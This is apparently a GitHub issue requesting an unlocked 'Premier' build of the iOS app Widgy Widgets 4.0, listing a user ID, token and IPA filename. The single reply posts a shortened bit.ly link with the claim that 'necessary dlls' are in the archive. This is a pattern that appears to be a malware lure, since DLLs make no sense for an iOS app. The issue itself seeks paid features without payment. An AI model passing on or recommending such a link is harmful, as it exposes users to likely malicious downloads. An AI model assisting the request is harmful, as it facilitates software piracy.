### ISSUE TITLE
Request Premier for Widgy Widgets: Home/Lock/Watch - 4.0

### ISSUE THREAD

**Issue by 0x111011111100110** [0x111011111100110/plenary-fraction-bright-amiss#496]
OneDrive-GL:/Public/IPAs/id1524540481/com.woodsign.Widgy_4.0_und3fined.ipa R2Actions:/anspretlishk/request/id1524540481

| Key | Info |
| -- | -- |
| User ID | _jKLoY6FYSI3V73p60yPf |
| App Id | id1524540481 |
| Filename | com.woodsign.Widgy_4.0_und3fined.ipa |
| Token | urv0S8QxgYX_uygfYUXVw |

**Comment by AaryanMadal** [comment]
try this
https://bit.ly/4gx42eQ
I put the necessary dlls in the archive
